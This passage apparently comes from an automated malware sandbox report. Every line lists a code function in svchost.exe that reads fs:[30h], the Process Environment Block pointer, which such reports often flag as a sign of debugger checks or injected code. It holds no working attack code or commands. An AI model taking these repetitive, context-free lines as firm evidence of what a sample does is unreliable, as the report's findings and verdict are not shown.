            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03031131 mov eax, dword ptr fs:[00000030h]2_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03031131 mov eax, dword ptr fs:[00000030h]2_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B136 mov eax, dword ptr fs:[00000030h]2_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105152 mov eax, dword ptr fs:[00000030h]2_2_03105152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029148 mov eax, dword ptr fs:[00000030h]2_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037152 mov eax, dword ptr fs:[00000030h]2_2_03037152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F172 mov eax, dword ptr fs:[00000030h]2_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C9179 mov eax, dword ptr fs:[00000030h]2_2_030C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03087190 mov eax, dword ptr fs:[00000030h]2_2_03087190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E11A4 mov eax, dword ptr fs:[00000030h]2_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B0 mov eax, dword ptr fs:[00000030h]2_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306D1D0 mov eax, dword ptr fs:[00000030h]2_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031051CB mov eax, dword ptr fs:[00000030h]2_2_031051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030551EF mov eax, dword ptr fs:[00000030h]2_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030351ED mov eax, dword ptr fs:[00000030h]2_2_030351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D71F9 mov esi, dword ptr fs:[00000030h]2_2_030D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D705E mov ebx, dword ptr fs:[00000030h]2_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D705E mov eax, dword ptr fs:[00000030h]2_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B052 mov eax, dword ptr fs:[00000030h]2_2_0305B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B106E mov eax, dword ptr fs:[00000030h]2_2_030B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105060 mov eax, dword ptr fs:[00000030h]2_2_03105060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov ecx, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD070 mov ecx, dword ptr fs:[00000030h]2_2_030AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD080 mov eax, dword ptr fs:[00000030h]2_2_030BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD080 mov eax, dword ptr fs:[00000030h]2_2_030BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D08D mov eax, dword ptr fs:[00000030h]2_2_0302D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035096 mov eax, dword ptr fs:[00000030h]2_2_03035096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D090 mov eax, dword ptr fs:[00000030h]2_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D090 mov eax, dword ptr fs:[00000030h]2_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306909C mov eax, dword ptr fs:[00000030h]2_2_0306909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031050D9 mov eax, dword ptr fs:[00000030h]2_2_031050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD0C0 mov eax, dword ptr fs:[00000030h]2_2_030AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD0C0 mov eax, dword ptr fs:[00000030h]2_2_030AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030590DB mov eax, dword ptr fs:[00000030h]2_2_030590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030550E4 mov eax, dword ptr fs:[00000030h]2_2_030550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030550E4 mov ecx, dword ptr fs:[00000030h]2_2_030550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037703 mov eax, dword ptr fs:[00000030h]2_2_03037703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035702 mov eax, dword ptr fs:[00000030h]2_2_03035702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035702 mov eax, dword ptr fs:[00000030h]2_2_03035702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F71F mov eax, dword ptr fs:[00000030h]2_2_0306F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F71F mov eax, dword ptr fs:[00000030h]2_2_0306F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF72E mov eax, dword ptr fs:[00000030h]2_2_030EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033720 mov eax, dword ptr fs:[00000030h]2_2_03033720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F972B mov eax, dword ptr fs:[00000030h]2_2_030F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029730 mov eax, dword ptr fs:[00000030h]2_2_03029730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029730 mov eax, dword ptr fs:[00000030h]2_2_03029730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03065734 mov eax, dword ptr fs:[00000030h]2_2_03065734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303973A mov eax, dword ptr fs:[00000030h]2_2_0303973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303973A mov eax, dword ptr fs:[00000030h]2_2_0303973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03103749 mov eax, dword ptr fs:[00000030h]2_2_03103749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302B765 mov eax, dword ptr fs:[00000030h]2_2_0302B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF78A mov eax, dword ptr fs:[00000030h]2_2_030EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B97A9 mov eax, dword ptr fs:[00000030h]2_2_030B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BF7AF mov eax, dword ptr fs:[00000030h]2_2_030BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031037B6 mov eax, dword ptr fs:[00000030h]2_2_031037B6
